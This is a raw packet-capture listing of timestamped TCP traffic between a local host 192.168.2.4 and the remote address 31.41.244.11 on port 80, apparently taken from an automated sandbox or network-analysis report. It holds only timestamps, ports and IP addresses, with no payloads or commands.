Jan 7, 2025 10:09:01.965806961 CET	50017	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:01.965821981 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:01.965847015 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:01.965873957 CET	50017	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:01.965874910 CET	50017	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:01.965912104 CET	50017	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:01.965914011 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:01.965926886 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:01.965938091 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:01.965948105 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:01.965958118 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:01.965991020 CET	50017	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:01.966015100 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:01.966027021 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:01.966036081 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:01.966062069 CET	50017	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:01.966062069 CET	50017	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:01.966063023 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:01.966089010 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:01.966093063 CET	50017	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:01.966134071 CET	50017	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:01.966134071 CET	50017	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:01.966142893 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:01.966155052 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:01.966164112 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:01.966191053 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:01.966198921 CET	50017	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:01.966208935 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:01.966221094 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:01.966234922 CET	50017	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:01.966275930 CET	50017	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:01.966298103 CET	50017	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:01.966320038 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:01.966330051 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:01.966341019 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:01.966351032 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:01.966376066 CET	50017	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:01.966397047 CET	50017	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:01.966413975 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:01.966425896 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:01.966435909 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:01.966447115 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:01.966460943 CET	50017	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:01.966500998 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:01.966511965 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:01.966521978 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:01.966536999 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:01.966555119 CET	50017	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:01.966555119 CET	50017	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:01.966629028 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:01.966639996 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:01.966650963 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:01.966660023 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:01.966667891 CET	50017	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:01.966667891 CET	50017	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:01.966672897 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:01.966694117 CET	50017	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:01.966713905 CET	50017	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:01.966732979 CET	50017	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:01.966779947 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:01.966792107 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:01.966801882 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:01.966811895 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:01.966823101 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:01.966835022 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:01.966842890 CET	50017	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:01.966861010 CET	50017	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:01.966903925 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:01.966912985 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:01.966922045 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:01.966923952 CET	50017	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:01.966933966 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:01.966943026 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:01.966976881 CET	50017	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:01.966978073 CET	50017	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:01.967041969 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:01.967051983 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:01.967062950 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:01.967071056 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:01.967081070 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:01.967092037 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:01.967098951 CET	50017	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:01.967103004 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:01.967114925 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:01.967125893 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:01.967128992 CET	50017	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:01.967166901 CET	50017	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:01.967181921 CET	50017	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:01.967272043 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:01.967283010 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:01.967293024 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:01.967303038 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:01.967319012 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:01.967360973 CET	50017	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:01.967366934 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:01.967376947 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:01.967381954 CET	50017	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:01.967391014 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:01.967401981 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:01.967410088 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:01.967444897 CET	50017	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:01.967463017 CET	50017	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:01.967554092 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:01.967565060 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:01.967573881 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:01.967583895 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:01.967595100 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:01.967614889 CET	50017	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:01.967618942 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:01.967644930 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:01.967653036 CET	50017	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:01.967677116 CET	50017	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:01.967717886 CET	50017	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:01.967842102 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:01.967868090 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:01.967876911 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:01.967889071 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:01.967982054 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:01.967987061 CET	50017	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:01.967992067 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:01.968007088 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:01.968058109 CET	50017	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:01.968070030 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:01.968079090 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:01.968162060 CET	50017	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:01.968394041 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:01.968405008 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:01.968414068 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:01.968467951 CET	50017	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:01.968471050 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:01.968482971 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:01.968493938 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:01.968539000 CET	50017	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:01.968539000 CET	50017	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:01.968564987 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:01.968580008 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:01.968611002 CET	50017	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:01.968648911 CET	50017	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:01.999912024 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:01.999970913 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:01.999974012 CET	50017	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:01.999982119 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:01.999994040 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:02.000021935 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:02.000031948 CET	50017	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:02.000034094 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:02.000061989 CET	50017	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:02.000086069 CET	50017	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:02.000098944 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:02.000109911 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:02.000118971 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:02.000180006 CET	50017	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:02.000250101 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:02.000261068 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:02.000271082 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:02.000281096 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:02.000284910 CET	50017	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:02.000292063 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:02.000302076 CET	50017	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:02.000335932 CET	50017	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:02.005017996 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:02.005028009 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:02.005038023 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:02.005048990 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:02.005057096 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:02.005067110 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:02.005075932 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:02.005084991 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:02.005095005 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:02.005119085 CET	50017	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:02.005119085 CET	50017	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:02.005156994 CET	50017	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:02.026583910 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:02.026595116 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:02.026606083 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:02.026670933 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:02.026673079 CET	50017	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:02.026681900 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:02.026693106 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:02.026696920 CET	50017	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:02.026705027 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:02.026741028 CET	50017	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:02.026781082 CET	50017	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:02.052551031 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:02.052562952 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:02.052576065 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:02.052601099 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:02.052617073 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:02.052628040 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:02.052637100 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:02.052639008 CET	50017	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:02.052687883 CET	50017	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:02.052687883 CET	50017	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:02.052697897 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:02.052709103 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:02.052723885 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:02.052735090 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:02.052756071 CET	50017	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:02.052778959 CET	50017	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:02.052803993 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:02.052814960 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:02.052831888 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:02.052840948 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:02.052856922 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:02.052865982 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:02.052876949 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:02.052880049 CET	50017	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:02.052891970 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:02.052905083 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:02.052922964 CET	50017	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:02.052922964 CET	50017	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:02.052934885 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:02.052947044 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:02.052962065 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:02.052968979 CET	50017	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:02.052973032 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:02.052983046 CET	50017	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:02.053000927 CET	50017	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:02.053030014 CET	50017	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:02.053036928 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:02.053049088 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:02.053059101 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:02.053093910 CET	50017	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:02.053108931 CET	50017	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:02.053208113 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:02.053219080 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:02.053232908 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:02.053242922 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:02.053247929 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:02.053261995 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:02.053267002 CET	50017	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:02.053275108 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:02.053284883 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:02.053291082 CET	50017	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:02.053296089 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:02.053302050 CET	50017	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:02.053308964 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:02.053327084 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:02.053337097 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:02.053339005 CET	50017	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:02.053348064 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:02.053356886 CET	50017	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:02.053359032 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:02.053381920 CET	50017	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:02.053395033 CET	50017	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:02.053423882 CET	50017	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:02.053451061 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:02.053461075 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:02.053469896 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:02.053478956 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:02.053489923 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:02.053520918 CET	50017	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:02.053544998 CET	50017	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:02.053554058 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:02.053569078 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:02.053579092 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:02.053590059 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:02.053622961 CET	50017	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:02.053627014 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:02.053637981 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:02.053647041 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:02.053658009 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:02.053679943 CET	50017	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:02.053679943 CET	50017	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:02.053705931 CET	50017	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:02.053714037 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:02.053724051 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:02.053744078 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:02.053761005 CET	50017	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:02.053824902 CET	50017	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:02.053869963 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:02.053879023 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:02.053888083 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:02.053900957 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:02.053910971 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:02.053920984 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:02.053930044 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:02.053940058 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:02.053960085 CET	50017	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:02.053960085 CET	50017	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:02.053977013 CET	50017	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:02.054071903 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:02.054081917 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:02.054094076 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:02.054133892 CET	50017	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:02.054167032 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:02.054177046 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:02.054186106 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:02.054199934 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:02.054225922 CET	50017	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:02.054250002 CET	50017	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:02.054644108 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:02.054653883 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:02.054660082 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:02.054706097 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:02.054706097 CET	50017	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:02.054706097 CET	50017	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:02.054717064 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:02.054729939 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:02.054754019 CET	50017	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:02.054759026 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:02.054760933 CET	50017	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:02.054769993 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:02.054780006 CET	50017	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:02.054815054 CET	50017	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:02.055135012 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:02.055165052 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:02.055176020 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:02.055186987 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:02.055195093 CET	50017	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:02.055211067 CET	50017	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:02.055218935 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:02.055232048 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:02.055241108 CET	50017	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:02.055264950 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:02.055278063 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:02.055279970 CET	50017	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:02.055294037 CET	50017	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:02.055336952 CET	50017	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:02.055336952 CET	50017	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:02.086833954 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:02.086846113 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:02.086855888 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:02.086922884 CET	50017	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:02.086966038 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:02.086977005 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:02.086993933 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:02.087004900 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:02.087014914 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:02.087024927 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:02.087033987 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:02.087033987 CET	50017	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:02.087045908 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:02.087057114 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:02.087057114 CET	50017	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:02.087090015 CET	50017	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:02.087090015 CET	50017	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:02.087096930 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:02.087106943 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:02.087110043 CET	50017	80	192.168.2.4	31.41.244.11
